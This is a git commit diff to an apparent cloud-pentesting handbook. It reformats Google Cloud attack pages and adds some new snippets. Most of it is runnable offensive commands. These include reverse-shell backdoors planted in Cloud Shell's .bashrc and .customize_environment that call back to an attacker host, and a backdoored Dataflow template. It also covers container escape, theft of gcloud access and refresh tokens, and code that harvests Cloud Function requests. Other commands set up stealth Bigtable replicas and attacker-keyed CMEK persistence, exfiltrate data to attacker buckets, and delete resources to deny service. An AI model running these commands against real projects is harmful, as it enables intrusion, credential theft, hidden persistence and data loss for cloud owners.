This commit is contained in:
carlospolop
2025-11-22 19:35:20 +01:00
parent 75115ef884
commit 6cd2d68471
52 changed files with 2110 additions and 152 deletions

View File

@@ -101,7 +101,6 @@
- [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
- [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
- [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md)
- [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md)
- [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md)
- [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
- [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
@@ -132,6 +131,7 @@
- [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md)
- [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
- [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md)
- [GCP - Vertex AI Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md)
- [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md)
- [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md)
- [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md)
@@ -188,6 +188,7 @@
- [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md)
- [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)
- [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
- [GCP - Vertex AI Enum](pentesting-cloud/gcp-security/gcp-services/gcp-vertex-ai-enum.md)
- [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
- [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md)
- [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md)

View File

@@ -16,6 +16,10 @@ For more information about Bigtable check:
Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.
<details>
<summary>Create stealth app profile</summary>
```bash
gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
@@ -26,6 +30,8 @@ gcloud bigtable app-profiles update stealth-profile \
--data-boost-compute-billing-owner=HOST_PAYS
```
</details>
As long as this profile exists you can reconnect using fresh credentials that reference it.
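A quick sketch to confirm the profile is still in place before you reconnect (instance ID is a placeholder; the profile name follows the example above):
<details>
<summary>Check the stealth app profile still exists</summary>
```bash
gcloud bigtable app-profiles describe stealth-profile --instance=<instance-id>
```
</details>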
### Maintain your own replica cluster
@@ -34,11 +40,17 @@ As long as this profile exists you can reconnect using fresh credentials that re
Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, **the cluster keeps a full copy of every table** until defenders explicitly remove it.
<details>
<summary>Create replica cluster</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
```
</details>
Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` so you can scale up instantly when you need to pull data.
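For example, a sketch of scaling the replica up just before a bulk pull and back down afterwards (names follow the example above):
<details>
<summary>Scale replica cluster up/down</summary>
```bash
# Scale up right before exfiltrating data
gcloud bigtable clusters update dark-clone --instance=<instance-id> --num-nodes=5
# Scale back down to stay quiet
gcloud bigtable clusters update dark-clone --instance=<instance-id> --num-nodes=1
```
</details>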
### Lock replication behind your own CMEK
@@ -47,12 +59,18 @@ Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instan
Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
<details>
<summary>Create CMEK-protected cluster</summary>
```bash
gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
```
</details>
Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
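A sketch of that kill switch against a key version in the attacker's project (key, ring and location are placeholders matching the command above):
<details>
<summary>Disable/enable the CMEK key version</summary>
```bash
# Brick the replica by disabling the key version it depends on
gcloud kms keys versions disable 1 --key=<key> --keyring=<ring> \
  --location=<kms-location> --project=<attacker-proj>
# Turn it back on later
gcloud kms keys versions enable 1 --key=<key> --keyring=<ring> \
  --location=<kms-location> --project=<attacker-proj>
```
</details>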
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -24,18 +24,30 @@ This console has some interesting capabilities for attackers:
This basically means that an attacker may put a backdoor in the home directory of the user and, as long as the user connects to the GC Shell at least every 120 days, the backdoor will survive and the attacker will get a shell every time it runs, just by doing:
<details>
<summary>Add reverse shell to .bashrc</summary>
```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
```
</details>
There is another file in the home folder called **`.customize_environment`** that, if it exists, is going to be **executed every time** the user accesses the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses the cloud shell frequently:
<details>
<summary>Create .customize_environment backdoor</summary>
```bash
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
```
</details>
> [!WARNING]
> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
@@ -45,11 +57,17 @@ This is the pop-up from executing `gcloud projects list` from the cloud shell (a
However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
<details>
<summary>Get access tokens from Cloud Shell</summary>
```bash
gcloud auth print-access-token
gcloud auth application-default print-access-token
```
</details>
#### How the SSH connection is established
Basically, these 3 API calls are used:

View File

@@ -8,6 +8,10 @@
Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
<details>
<summary>Create Dataflow flex template with backdoor</summary>
```bash
git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
cd python-docs-samples/dataflow/flex-templates/getting_started
@@ -38,10 +42,16 @@ gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
--region=us-central1
```
</details>
**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that make the Dockerfile execute arbitrary things). At this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so every time the job is executed, it'll be executed.
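For example, a minimal sketch of planting that backdoor from inside the reverse shell (the `/template` path and `getting_started.py` come from the example above; the listener address is a placeholder):
<details>
<summary>Backdoor the template main script</summary>
```bash
# Run inside the reverse shell obtained during the build
cd /template
# Append a snippet that spawns a reverse shell whenever the pipeline script runs
cat >> getting_started.py <<'EOF'
import subprocess
subprocess.Popen('bash -c "bash -i >& /dev/tcp/<ATTACKER-IP>/443 0>&1"', shell=True)
EOF
```
</details>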
Then, next time the job is executed, the compromised container built will be run:
<details>
<summary>Run Dataflow template</summary>
```bash
# Run template
gcloud dataflow $NAME_TEMPLATE run testing \
@@ -50,6 +60,8 @@ gcloud dataflow $NAME_TEMPLATE run testing \
--region=us-central1
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,10 +14,16 @@ Find more information about Logging in:
Create a sink to exfiltrate the logs to an attacker-accessible destination:
<details>
<summary>Create logging sink</summary>
```bash
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -6,10 +6,16 @@
To get the **current token** of a user you can run:
<details>
<summary>Get access token from SQLite database</summary>
```bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
```
</details>
Check in this page how to **directly use this token using gcloud**:
{{#ref}}
@@ -18,18 +24,30 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
To get the details to **generate a new access token** run:
<details>
<summary>Get refresh token from SQLite database</summary>
```bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
```
</details>
It's also possible to find refresh tokens in **`$HOME/.config/gcloud/application_default_credentials.json`** and in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
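A minimal sketch to pull the refresh tokens out of those files (assumes `jq` is installed; the paths are the ones mentioned above):
<details>
<summary>Extract refresh tokens from gcloud config files</summary>
```bash
jq -r '.refresh_token' $HOME/.config/gcloud/application_default_credentials.json
jq -r '.refresh_token' $HOME/.config/gcloud/legacy_credentials/*/adc.json
```
</details>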
To get a new refreshed access token with the **refresh token**, client ID, and client secret run:
<details>
<summary>Get new access token using refresh token</summary>
```bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
</details>
The refresh token's validity can be managed in **Admin** > **Security** > **Google Cloud session control**; by default it's set to 16h, although it can be set to never expire:
<figure><img src="../../../images/image (11).png" alt=""><figcaption></figcaption></figure>
@@ -51,12 +69,22 @@ Then, gcloud will use the state and code with a some hardcoded `client_id` (`325
You can find all Google scopes in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) or get them executing:
<details>
<summary>Get all Google OAuth scopes</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
```
</details>
It's possible to see which scopes the application that **`gcloud`** uses to authenticate can support with this script:
<details>
<summary>Test supported scopes for gcloud</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
@@ -67,6 +95,8 @@ curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE
done
```
</details>
After executing it, it was confirmed that this app supports these scopes:
```

View File

@@ -14,6 +14,10 @@ For more information about Cloud Storage check:
You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
<details>
<summary>Create and use HMAC key for Storage access</summary>
```bash
# Create key
gsutil hmac create <sa-email>
@@ -25,6 +29,8 @@ gsutil config -a
gsutil ls gs://[BUCKET_NAME]
```
</details>
Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
### Give Public Access

View File

@@ -28,10 +28,16 @@ With these permissions it's possible to:
With this permission it's possible to **see the logs of the App**:
<details>
<summary>Tail app logs</summary>
```bash
gcloud app logs tail -s <name>
```
</details>
### Read Source Code
The source code of all the versions and services is **stored in the bucket** named **`staging.<proj-id>.appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.
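A sketch of pulling that bucket locally for review (assumes gsutil is already authenticated; `<proj-id>` is the victim project ID):
<details>
<summary>Download App Engine source bucket</summary>
```bash
gsutil ls gs://staging.<proj-id>.appspot.com/
gsutil -m cp -r gs://staging.<proj-id>.appspot.com/ ./appengine-src/
```
</details>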

View File

@@ -13,9 +13,15 @@ For more information about Bigtable check:
> [!TIP]
> Install the `cbt` CLI once via the Cloud SDK so the commands below work locally:
>
> <details>
>
> <summary>Install cbt CLI</summary>
>
> ```bash
> gcloud components install cbt
> ```
>
> </details>
### Read rows
@@ -23,21 +29,31 @@ For more information about Bigtable check:
`cbt` ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.
<details>
<summary>Read Bigtable entries</summary>
```bash
# Install cbt
gcloud components update
gcloud components install cbt
# Read entries with creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
```
</details>
### Write rows
**Permissions:** `bigtable.tables.mutateRows` (you will need `bigtable.tables.readRows` to confirm the change).
Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.
<details>
<summary>Inject malicious row</summary>
```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
@@ -48,6 +64,8 @@ cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 prof
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337
```
</details>
`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.
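For instance, a sketch of pushing a binary payload from a local file using that syntax (table, row key and column names are placeholders):
<details>
<summary>Push raw bytes with cbt set</summary>
```bash
# Upload raw bytes from a local file into a cell
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> <row-key> <family>:<column>=@/tmp/payload.bin
```
</details>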
### Dump rows to your bucket
@@ -59,6 +77,10 @@ It's possible to exfiltrate the contents of an entire table to a bucket controll
> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over some SA with enough permissions to perform the export (by default, if not indicated otherwise, the default compute SA will be used).
<details>
<summary>Export Bigtable to GCS bucket</summary>
```bash
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
@@ -76,6 +98,8 @@ gcloud dataflow jobs run dump-bigtable3 \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
</details>
> [!NOTE]
> Switch the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.
@@ -90,6 +114,10 @@ It's possible to import the contents of an entire table from a bucket controlled
> [!NOTE]
> Note that you will need the permission `iam.serviceAccounts.actAs` over some SA with enough permissions to perform the import (by default, if not indicated otherwise, the default compute SA will be used).
<details>
<summary>Import from GCS bucket to Bigtable</summary>
```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=<REGION> \
@@ -107,12 +135,18 @@ gcloud dataflow jobs run import-bt-$(date +%s) \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```
</details>
### Restoring backups
**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`.
An attacker with these permissions can restore a backup into a new table under their control in order to recover old sensitive data.
<details>
<summary>Restore Bigtable backup</summary>
```bash
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
--cluster=<CLUSTER_ID_SOURCE>
@@ -125,6 +159,8 @@ gcloud bigtable instances tables restore \
--project=<PROJECT_ID_DESTINATION>
```
</details>
### Undelete tables
**Permissions:** `bigtable.tables.undelete`
@@ -136,6 +172,10 @@ This is particularly useful for:
- Accessing historical data that was intentionally purged
- Reversing accidental or malicious deletions to maintain persistence
<details>
<summary>Undelete Bigtable table</summary>
```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
@@ -146,6 +186,8 @@ gcloud bigtable instances tables undelete <table-id> \
--instance=<instance-id>
```
</details>
> [!NOTE]
> The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.
@@ -159,6 +201,10 @@ Authorized views let you present a curated subset of the table. Instead of respe
> [!WARNING]
> The thing is that to create an authorized view you also need to be able to read and mutate rows in the base table, therefore you are not obtaining any extra permissions, so this technique is mostly useless.
<details>
<summary>Create authorized view</summary>
```bash
cat <<'EOF' > /tmp/credit-cards.json
{
@@ -182,6 +228,8 @@ gcloud bigtable authorized-views add-iam-policy-binding card-dump \
--member='user:<attacker@example.com>' --role='roles/bigtable.reader'
```
</details>
Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.
### Read Authorized Views
@@ -190,6 +238,9 @@ Because access is scoped to the view, defenders often overlook the fact that you
If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will probably limit what you can access from the table. Below is an example using Python:
<details>
<summary>Read from authorized view (Python)</summary>
```python
from google.cloud import bigtable
@@ -226,6 +277,8 @@ for response in rows:
print(f" {family}:{qualifier} = {value}")
```
</details>
### Denial of Service via Delete Operations
**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`
@@ -240,6 +293,10 @@ Any of the Bigtable delete permissions can be weaponized for denial of service a
- **`bigtable.instances.delete`**: Remove complete Bigtable instances, wiping out all tables and configurations
- **`bigtable.tables.delete`**: Delete individual tables, causing data loss and application failures
<details>
<summary>Delete Bigtable resources</summary>
```bash
# Delete a table
gcloud bigtable instances tables delete <table-id> \
@@ -265,6 +322,8 @@ gcloud bigtable clusters delete <cluster-id> \
gcloud bigtable instances delete <instance-id>
```
</details>
> [!WARNING]
> Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.

View File

@@ -14,6 +14,10 @@ For more information about Cloud Build check:
With this permission you can approve the execution of a **codebuild that requires approval**.
<details>
<summary>Approve Cloud Build execution</summary>
```bash
# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve
curl -X POST \
@@ -26,6 +30,8 @@ curl -X POST \
"https://cloudbuild.googleapis.com/v1/projects/<PROJECT_ID>/locations/<LOCATION>/builds/<BUILD_ID>:approve"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,6 +14,10 @@ Find some information about Cloud Functions in:
With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function:
<details>
<summary>Get signed URL for source code download</summary>
```bash
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
@@ -21,6 +25,8 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca
-d '{}'
```
</details>
### Steal Cloud Function Requests
If the Cloud Function is managing sensitive information that users are sending (e.g. passwords or tokens), with enough privileges you could **modify the source code of the function and exfiltrate** this information.
@@ -29,6 +35,10 @@ Moreover, Cloud Functions running in python use **flask** to expose the web serv
For example this code implements the attack:
<details>
<summary>Steal Cloud Function requests (Python injection)</summary>
```python
import functions_framework
@@ -126,6 +136,8 @@ def injection():
return str(e)
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,6 +14,10 @@ For more information about Cloud Shell check:
Note that the Google Cloud Shell runs inside a container, so you can **easily escape to the host** by doing:
<details>
<summary>Container escape commands</summary>
```bash
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
@@ -21,18 +25,30 @@ sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
```
</details>
This is not considered a vulnerability by Google, but it gives you a wider vision of what is happening in that env.
Moreover, notice that from the host you can find a service account token:
<details>
<summary>Get service account from metadata</summary>
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
```
</details>
With the following scopes:
<details>
<summary>Get service account scopes</summary>
```bash
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
@@ -41,26 +57,44 @@ https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
```
</details>
Enumerate metadata with LinPEAS:
<details>
<summary>Enumerate metadata with LinPEAS</summary>
```bash
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
```
</details>
After using [https://github.com/carlospolop/bf_my_gcp_permissions](https://github.com/carlospolop/bf_my_gcp_permissions) with the token of the Service Account **no permission was discovered**...
### Use it as Proxy
If you want to use your Google Cloud Shell instance as a proxy, you need to run the following commands (or insert them in the .bashrc file):
<details>
<summary>Install Squid proxy</summary>
```bash
sudo apt install -y squid
```
</details>
Just so you know, Squid is an HTTP proxy server. Create a **squid.conf** file with the following settings:
<details>
<summary>Create squid.conf file</summary>
```bash
http_port 3128
cache_dir /var/cache/squid 100 16 256
@@ -68,28 +102,52 @@ acl all src 0.0.0.0/0
http_access allow all
```
</details>
Copy the **squid.conf** file to **/etc/squid**:
<details>
<summary>Copy config to /etc/squid</summary>
```bash
sudo cp squid.conf /etc/squid
```
</details>
Finally run the squid service:
<details>
<summary>Start Squid service</summary>
```bash
sudo service squid start
```
</details>
Use ngrok to let the proxy be available from outside:
<details>
<summary>Expose proxy with ngrok</summary>
```bash
./ngrok tcp 3128
```
</details>
After running it, copy the tcp:// URL. If you want to use the proxy from a browser, remove the tcp:// part and the port from the URL, and put that port in the port field of your browser's proxy settings (Squid is an HTTP proxy server).
To have everything start automatically, the .bashrc file should contain the following lines:
<details>
<summary>Add to .bashrc for automatic startup</summary>
```bash
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
@@ -97,6 +155,8 @@ sudo service squid start
cd ngrok;./ngrok tcp 3128
```
</details>
The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,6 +14,10 @@ For more information about Cloud SQL check:
To connect to the databases you **just need access to the database port** and know the **username** and **password**; there aren't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and **allow your own IP address to access it**.
<details>
<summary>Allow your IP and connect to database</summary>
```bash
# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
@@ -27,6 +31,8 @@ mysql -h <ip_db> # If mysql
gcloud sql connect mysql --user=root --quiet
```
</details>
It's also possible to use **`--no-backup`** to **disrupt the backups** of the database.
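A sketch of disrupting the backups with that flag (instance name is a placeholder):
<details>
<summary>Disable automated backups</summary>
```bash
gcloud sql instances patch <instance-name> --no-backup
```
</details>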
As these are the requirements, I'm not completely sure what the permissions **`cloudsql.instances.connect`** and **`cloudsql.instances.login`** are for. If you know, send a PR!
@@ -35,71 +41,119 @@ As these are the requirements I'm not completely sure what are the permissions *
Get a **list of all the users** of the database:
<details>
<summary>List database users</summary>
```bash
gcloud sql users list --instance <instance-name>
```
</details>
### `cloudsql.users.create`
This permission allows you to **create a new user inside** the database:
<details>
<summary>Create database user</summary>
```bash
gcloud sql users create <username> --instance <instance-name> --password <password>
```
</details>
### `cloudsql.users.update`
This permission allows you to **update a user inside** the database. For example, you could change its password:
<details>
<summary>Update user password</summary>
```bash
gcloud sql users set-password <username> --instance <instance-name> --password <password>
```
</details>
### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`
Backups might contain **old sensitive information**, so it's interesting to check them.\
**Restore a backup** inside a database:
<details>
<summary>Restore database backup</summary>
```bash
gcloud sql backups restore <backup-id> --restore-instance <instance-id>
```
</details>
To do it in a stealthier way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases.
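A minimal sketch of that stealthier path, assuming a MySQL instance and placeholder names/regions; the backup ID comes from the backup listing permissions above:
<details>
<summary>Restore backup into a new instance</summary>
```bash
# Create a throwaway instance under your control (must be compatible with the backup)
gcloud sql instances create exfil-copy --database-version=MYSQL_8_0 \
  --tier=db-f1-micro --region=us-central1
# Restore the victim backup into it
gcloud sql backups restore <backup-id> --restore-instance=exfil-copy \
  --backup-instance=<source-instance-id>
```
</details>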
### `cloudsql.backupRuns.delete`
This permission allows you to delete backups:
<details>
<summary>Delete backup</summary>
```bash
gcloud sql backups delete <backup-id> --instance <instance-id>
```
</details>
### `cloudsql.instances.export`, `storage.objects.create`
**Export a database** to a Cloud Storage Bucket so you can access it from there:
<details>
<summary>Export database to bucket</summary>
```bash
# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>
```
</details>
### `cloudsql.instances.import`, `storage.objects.get`
**Import a database** (overwrite) from a Cloud Storage Bucket:
<details>
<summary>Import database from bucket</summary>
```bash
# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>
```
</details>
### `cloudsql.databases.delete`
Delete a database from the db instance:
<details>
<summary>Delete database</summary>
```bash
gcloud sql databases delete <db-name> --instance <instance-id>
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -16,11 +16,17 @@ This would allow an attacker to **access the data contained inside already exist
It's possible to export a VM image to a bucket and then download it and mount it locally with the command:
<details>
<summary>Export and download VM image</summary>
```bash
gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# Then download the export from the bucket and mount it locally
```
</details>
For performing this action the attacker might need privileges over the storage bucket and definitely **privileges over cloudbuild**, as it's the **service** that is going to be asked to perform the export.\
Moreover, for this to work the cloudbuild SA and the compute SA need privileged permissions.\
The cloudbuild SA `<project-id>@cloudbuild.gserviceaccount.com` needs:
@@ -38,6 +44,10 @@ And the SA `<project-id>-compute@developer.gserviceaccount.com` needs:
It's not possible to directly export snapshots and disks, but it's possible to **transform a snapshot into a disk and a disk into an image** and, following the **previous section**, export that image to inspect it locally
<details>
<summary>Create disk from snapshot and image from disk</summary>
```bash
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
@@ -46,18 +56,30 @@ gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
```
</details>
### Inspect an Image creating a VM
With the goal of accessing the **data stored in an image** or inside a **running VM** from which an attacker **has created an image**, it's possible to grant an external account access over the image:
<details>
<summary>Grant access to image and create VM</summary>
```bash
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'
```
</details>
and then create a new VM from it:
<details>
<summary>Create VM instance from image</summary>
```bash
gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
@@ -65,55 +87,93 @@ gcloud compute instances create [INSTANCE_NAME] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]
```
</details>
If you couldn't give your external account access over the image, you could launch a VM using that image in the victim's project and **make the metadata execute a reverse shell** to access the image by adding the param:
<details>
<summary>Create VM with reverse shell in metadata</summary>
```bash
--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'
```
</details>
### Inspect a Snapshot/Disk attaching it to a VM
With the goal of accessing the **data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow the previous steps.**
Or you could **grant an external account access** over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):
<details>
<summary>Grant access to disk</summary>
```bash
gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'
```
</details>
**Attach the disk** to an instance:
<details>
<summary>Attach disk to instance</summary>
```bash
gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]
```
</details>
Mount the disk inside the VM:
1. **SSH into the VM**:
<details>
<summary>SSH into VM and mount disk</summary>
```sh
gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
```
</details>
2. **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc.
3. **Format and Mount the Disk** (if it's a new or raw disk):
- Create a mount point:
<details>
<summary>Create mount point and mount</summary>
```sh
sudo mkdir -p /mnt/disks/[MOUNT_DIR]
```
</details>
- Mount the disk:
<details>
<summary>Mount disk device</summary>
```sh
sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
```
</details>
If you **cannot give access to an external project** to the snapshot or disk, you might need to **perform these actions inside an instance in the same project as the snapshot/disk**.

View File

@@ -14,6 +14,10 @@ For more information about Filestore check:
A shared filesystem **might contain sensitive information** interesting from an attacker's perspective. With access to the Filestore it's possible to **mount it**:
<details>
